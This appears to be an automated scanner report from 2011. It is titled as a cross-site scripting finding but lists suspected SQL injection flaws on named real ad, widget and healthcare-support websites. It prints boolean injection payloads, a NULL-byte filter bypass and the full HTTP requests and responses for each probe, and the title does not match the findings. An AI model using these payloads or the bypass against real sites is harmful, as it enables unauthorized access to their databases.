CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Report generated by XSS.CX at Mon May 02 17:44:31 CDT 2011.
1.1. http://ads2.adbrite.com/v0/ad [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://ads2.adbrite.com
Path: /v0/ad
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3Ax4co%2Cx4cw%2Cx4cn%2C12gg8%2C12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 12:58:57 GMT
Set-Cookie: rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY2ODQzMzkY5Y3LuQsiJDRkYWI3ZDM1LWIxZDItOTE1YS1kM2MwLTlkNTdmOWM2NmIwNwo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgojCgY3NDI2OTcY8rjOrAwiEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQn_3NjAoYv7jF4BMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 12:58:57 GMT
Set-Cookie: vsd=0@1@4dbeaa91@www.dailytelegraph.com.au; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 12:58:57 GMT
Set-Cookie: fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2%2C86eg6%2C1uo0%7Clkkk29%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 12:58:57 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 12:58:57 GMT
Content-Length: 2784
var AdBrite_Title_Color_Default = '0000FF';
var AdBrite_Text_Color_Default = '000000';
var AdBrite_Background_Color_Default = 'FFFFFF';
var AdBrite_Border_Color_Default = 'CCCCCC';
var AdBrite_URL_Color_Default = '008000';
function AdBrite_IAB_Zone_Test_Color(color) {
    if (typeof(color) != 'string') return false;
    if (!color.match(/^[0-9A-Fa-f]{6}$/) && !color.match(/^[0-9A-Fa-f]{3}$/)) return false;
    return color;
}
var AdBrite_Title_Color = AdBrite_IAB_Zone_Test_Color(AdBrite_Title_Color);
var AdBrite_Text_Color = AdBrite_IAB_Zone_Test_Color(AdBrite_Text_Color) ...[SNIP]...
The zs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zs parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
var AdBrite_Title_Color_Default = '0000FF';
var AdBrite_Text_Color_Default = '000000';
var AdBrite_Background_Color_Default = 'FFFFFF';
var AdBrite_Border_Color_Default = 'CCCCCC';
var AdBrite_URL_Col ...[SNIP]...
The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 11934797%20or%201%3d1--%20 and 11934797%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 18059503%20or%201%3d1--%20 and 18059503%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /8/B0/97%20and%201%3d1--%20/12F97D19102C47E09DCCA28EA33.jpg?pid=5670.200&qs=yvF%5Boby1L%7C%2FOjugd%2FekwBYzxvkTmohuh5dts%29%7Dxs%3EMOSJE6INZHLL%27Dtssumhohk%29miz%3EMkduxodfxh%29M%5B!Xkf~vpu~%26Fxrzvqzlwk%27Tjxyrrn!Fro%2997!Xzd%7Diz!2%26Vrrjf%257%3CB%3B HTTP/1.1
Host: cr0.worthathousandwords.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2778
Cache-Control: private, max-age=3600
Date: Mon, 02 May 2011 15:28:29 GMT
Connection: close
Vary: Accept-Encoding
<html> <head> <title>The resource cannot be found.</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-fami ...[SNIP]... </b> Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1
</font>
</body> </html>
<!-- [HttpException]
   at System.Web.CachedPathData.GetPhysicalPath(VirtualPath virtualPath)
   at System.Web.CachedPathData.GetConfigPathData(String configPath)
   at System.Web.CachedPathData.GetVirtualPathData(VirtualPath virtualPath, Boolean permitPathsOutsideApp)
   at System.Web.HttpContext.GetFilePathData()
   at System.Web.HttpContext.GetConfigurationPathData()
   at System.Web.Configuration.RuntimeConfig.GetConfig(HttpContext context)
   at System.Web.Configuration.CustomErrorsSection.GetSettings(HttpContext context, Boolean canThrow)
   at System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow, Boolean localExecute)
   at System.Web.HttpContext.ReportRuntimeErrorIfExists(RequestNotificationStatus& status) -->
<!-- This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using <customErrors mode="Off"/>. Consider using <customErrors mode="On"/> or <customErrors mode="RemoteOnly"/> in production environments.-->
Request 2
GET /8/B0/97%20and%201%3d2--%20/12F97D19102C47E09DCCA28EA33.jpg?pid=5670.200&qs=yvF%5Boby1L%7C%2FOjugd%2FekwBYzxvkTmohuh5dts%29%7Dxs%3EMOSJE6INZHLL%27Dtssumhohk%29miz%3EMkduxodfxh%29M%5B!Xkf~vpu~%26Fxrzvqzlwk%27Tjxyrrn!Fro%2997!Xzd%7Diz!2%26Vrrjf%257%3CB%3B HTTP/1.1
Host: cr0.worthathousandwords.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 2720
Cache-Control: private, max-age=3600
Date: Mon, 02 May 2011 15:28:29 GMT
Connection: close
Vary: Accept-Encoding
<html> <head> <title>The resource cannot be found.</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-fami ...[SNIP]... </b> Microsoft .NET Framework Version:2.0.50727.3603; ASP.NET Version:2.0.50727.3082
</font>
</body> </html>
<!-- [HttpException]
   at System.Web.CachedPathData.GetConfigPathData(String configPath)
   at System.Web.CachedPathData.GetVirtualPathData(VirtualPath virtualPath, Boolean permitPathsOutsideApp)
   at System.Web.HttpContext.GetFilePathData()
   at System.Web.HttpContext.GetConfigurationPathData()
   at System.Web.Configuration.RuntimeConfig.GetConfig(HttpContext context)
   at System.Web.Configuration.CustomErrorsSection.GetSettings(HttpContext context, Boolean canThrow)
   at System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow, Boolean localExecute)
   at System.Web.HttpRuntime.FinishRequest(HttpWorkerRequest wr, HttpContext context, Exception e) -->
<!-- This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using <customErrors mode="Off"/>. Consider using <customErrors mode="On"/> or <customErrors mode="RemoteOnly"/> in production environments.-->
The pid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /8/B0/97/12F97D19102C47E09DCCA28EA33.jpg?pid=5670.200%00'&qs=yvF%5Boby1L%7C%2FOjugd%2FekwBYzxvkTmohuh5dts%29%7Dxs%3EMOSJE6INZHLL%27Dtssumhohk%29miz%3EMkduxodfxh%29M%5B!Xkf~vpu~%26Fxrzvqzlwk%27Tjxyrrn!Fro%2997!Xzd%7Diz!2%26Vrrjf%257%3CB%3B HTTP/1.1
Host: cr0.worthathousandwords.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 5181
Cache-Control: private, max-age=3600
Date: Mon, 02 May 2011 15:28:17 GMT
Connection: close
Vary: Accept-Encoding
<html> <head> <title>A potentially dangerous Request.QueryString value was detected from the client (qs="...!2&Vrrjf%7<B;").</title> <style> body {fon ...[SNIP]... <b> Exception Details: </b> ...[SNIP]... <code>
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code> ...[SNIP]...
Request 2
GET /8/B0/97/12F97D19102C47E09DCCA28EA33.jpg?pid=5670.200%00''&qs=yvF%5Boby1L%7C%2FOjugd%2FekwBYzxvkTmohuh5dts%29%7Dxs%3EMOSJE6INZHLL%27Dtssumhohk%29miz%3EMkduxodfxh%29M%5B!Xkf~vpu~%26Fxrzvqzlwk%27Tjxyrrn!Fro%2997!Xzd%7Diz!2%26Vrrjf%257%3CB%3B HTTP/1.1
Host: cr0.worthathousandwords.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: image/jpg
Content-Length: 4894
Cache-Control: private, max-age=3600
Date: Mon, 02 May 2011 15:28:18 GMT
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /C/AE/42%20and%201%3d1--%20/DF69B0E03BBF9D28DDBF2CEA27A.jpg?pid=5670.200&qs=yvF%5Boby1L%7C%2FOjugd%2FekwB%7Dz%C2%802OQ3irv*%7BuqCKY%24%27!ftg%29LPQFG%29miz%3EQkd%7Br%27Ntxh%29Eipzz%23QMWBF%26Fxqwmngqli5!Wkdm%24%7Bij%26KY%24%5Einzh%29Thqjx%23Ws~%22 HTTP/1.1
Host: cr0.worthathousandwords.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 2720
Cache-Control: private, max-age=3600
Date: Mon, 02 May 2011 15:28:17 GMT
Connection: close
Vary: Accept-Encoding
<html> <head> <title>The resource cannot be found.</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-fami ...[SNIP]... </b> Microsoft .NET Framework Version:2.0.50727.3603; ASP.NET Version:2.0.50727.3082
</font>
</body> </html>
<!-- [HttpException]
   at System.Web.CachedPathData.GetConfigPathData(String configPath)
   at System.Web.CachedPathData.GetVirtualPathData(VirtualPath virtualPath, Boolean permitPathsOutsideApp)
   at System.Web.HttpContext.GetFilePathData()
   at System.Web.HttpContext.GetConfigurationPathData()
   at System.Web.Configuration.RuntimeConfig.GetConfig(HttpContext context)
   at System.Web.Configuration.CustomErrorsSection.GetSettings(HttpContext context, Boolean canThrow)
   at System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow, Boolean localExecute)
   at System.Web.HttpRuntime.FinishRequest(HttpWorkerRequest wr, HttpContext context, Exception e) -->
<!-- This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using <customErrors mode="Off"/>. Consider using <customErrors mode="On"/> or <customErrors mode="RemoteOnly"/> in production environments.-->
Request 2
GET /C/AE/42%20and%201%3d2--%20/DF69B0E03BBF9D28DDBF2CEA27A.jpg?pid=5670.200&qs=yvF%5Boby1L%7C%2FOjugd%2FekwB%7Dz%C2%802OQ3irv*%7BuqCKY%24%27!ftg%29LPQFG%29miz%3EQkd%7Br%27Ntxh%29Eipzz%23QMWBF%26Fxqwmngqli5!Wkdm%24%7Bij%26KY%24%5Einzh%29Thqjx%23Ws~%22 HTTP/1.1
Host: cr0.worthathousandwords.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/topic/What_Is_Hipaa?p=l&as=REDACTED&ac=529&kgl=38620759
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2778
Cache-Control: private, max-age=3600
Date: Mon, 02 May 2011 15:28:17 GMT
Connection: close
Vary: Accept-Encoding
<html> <head> <title>The resource cannot be found.</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-fami ...[SNIP]... </b> Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1
</font>
</body> </html>
<!-- [HttpException]
   at System.Web.CachedPathData.GetPhysicalPath(VirtualPath virtualPath)
   at System.Web.CachedPathData.GetConfigPathData(String configPath)
   at System.Web.CachedPathData.GetVirtualPathData(VirtualPath virtualPath, Boolean permitPathsOutsideApp)
   at System.Web.HttpContext.GetFilePathData()
   at System.Web.HttpContext.GetConfigurationPathData()
   at System.Web.Configuration.RuntimeConfig.GetConfig(HttpContext context)
   at System.Web.Configuration.CustomErrorsSection.GetSettings(HttpContext context, Boolean canThrow)
   at System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow, Boolean localExecute)
   at System.Web.HttpContext.ReportRuntimeErrorIfExists(RequestNotificationStatus& status) -->
<!-- This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using <customErrors mode="Off"/>. Consider using <customErrors mode="On"/> or <customErrors mode="RemoteOnly"/> in production environments.-->
The ASPSESSIONIDQSASBQTR cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the ASPSESSIONIDQSASBQTR cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
<td class="MainBody" bgcolor="#FFFFFF" valign="top"> <H2>Welcome!</H2> Already registered? Please <A HREF='login.asp'>login.</A><BR><BR> If you don't have a login to the TriZetto Customer Support Interface and would like one, please contact your TriZetto Customer Support Representative.<BR>
<BR><BR> <align="center"><B><FONT SIZE=4><B>Onyx Use Agreement</B></FONT></B> <BR><BR> <width="95%" align="left">You may now attach documents to your support request. Since attachments that you submit may contain protected health information (PHI) or other confidential or proprietary information, TriZetto is requiring that you use a unique user ID and a strong password when accessing ONYX. Do not share your user ID or password with anyone else.<BR><BR>TriZetto’s password policy requires that a strong passwo ...[SNIP]...
<td class="MainBody" bgcolor="#FFFFFF" valign="top"> <H2>Welcome!</H2> Already registered? Please <A HREF='login.asp'>login.</A><BR><BR> If you don't have a login to the TriZetto Customer Support Interface and would like one, please contact your TriZetto Customer Support Representative.<BR>
<BR><BR> <align="center"><B><FONT SIZE=4><B>Onyx Use Agreement</B></FONT></B> <BR><BR> <width="95%" align="left">You may now attach documents to your support request. Since attachments that you submit may contain protected health information (PHI) or other confidential or proprietary information, TriZetto is requiring that you use a unique user ID and a strong password when accessing ONYX. Do not share your user ID or password with anyone else.<BR><BR>TriZetto’s password policy requires that a strong password consist of at least eight (8) characters and contain three of th ...[SNIP]...
The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 83147941%20or%201%3d1--%20 and 83147941%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 13805294%20or%201%3d1--%20 and 13805294%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The num_ads parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the num_ads parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 12:50:42 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 21455
{
var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te ...[SNIP]... ica.com/LP/0986607f354b447abb58ebd9e4ca88bf/a.aspx%3Frm_state%3Db%249ec973e97c8140bbb19f14a3efbea1fd%7Ce%240%7Cl%240%7Cu%24";
google_ad.visible_url = "www.SpringboardAmerica.com";
google_ad.line1 = "Illegal Immigrants:";
google_ad.line2 = "Should their kids become citizens?";
google_ad.line3 = "Share your opinion now!";
google_ad.regionname = "";
google_ads[11] = google_ad;
google_ad = new Object(); ...[SNIP]...
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 12:50:43 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 21850
{
var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te ...[SNIP]...
The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 19754759%20or%201%3d1--%20 and 19754759%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The p parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the p parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The acs cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the acs cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14286747'%20or%201%3d1--%20 and 14286747'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /widgets14286747'%20or%201%3d1--%20/multiwidget3/TA/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /widgets14286747' or 1=1-- /multiwidget3/TA/FM-NEWS on this server.</p> </body></html>
Request 2
GET /widgets14286747'%20or%201%3d2--%20/multiwidget3/TA/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 0.02577
Status: 404
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Mon, 02 May 2011 12:45:48 GMT
Connection: close
Content-Length: 36118
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <meta name="keywords" content="Mozo, money info zone, information, bank reviews"/><meta name="description" content="Find products by provider with Mozo. Read reviews about providers, or write your own review about provider."/><title>Mozo - Compare Credit Cards, Home Loans, Term Deposits and more</title> <meta name="robots" content="noydir" /> <meta name="robots" content="noodp" /> <link rel="canonical" href="http://mozo.com.au/widgets14286747' or 1=2-- /multiwidget3/TA/FM-NEWS">
<script type="text/javascript"> var logged_in = false; var searchType = ''; //var providerNames; // = []; </script>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 20680832'%20or%201%3d1--%20 and 20680832'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /widgets/multiwidget320680832'%20or%201%3d1--%20/TA/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /widgets/multiwidget320680832' or 1=1-- /TA/FM-NEWS on this server.</p> </body></html>
Request 2
GET /widgets/multiwidget320680832'%20or%201%3d2--%20/TA/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Status: 404
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Mon, 02 May 2011 12:46:10 GMT
Connection: close
Content-Length: 36118
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <meta name="keywords" content="Mozo, money info zone, information, bank reviews"/><meta name="description" content="Find products by provider with Mozo. Read reviews about providers, or write your own review about provider."/><title>Mozo - Compare Credit Cards, Home Loans, Term Deposits and more</title> <meta name="robots" content="noydir" /> <meta name="robots" content="noodp" /> <link rel="canonical" href="http://mozo.com.au/widgets/multiwidget320680832' or 1=2-- /TA/FM-NEWS">
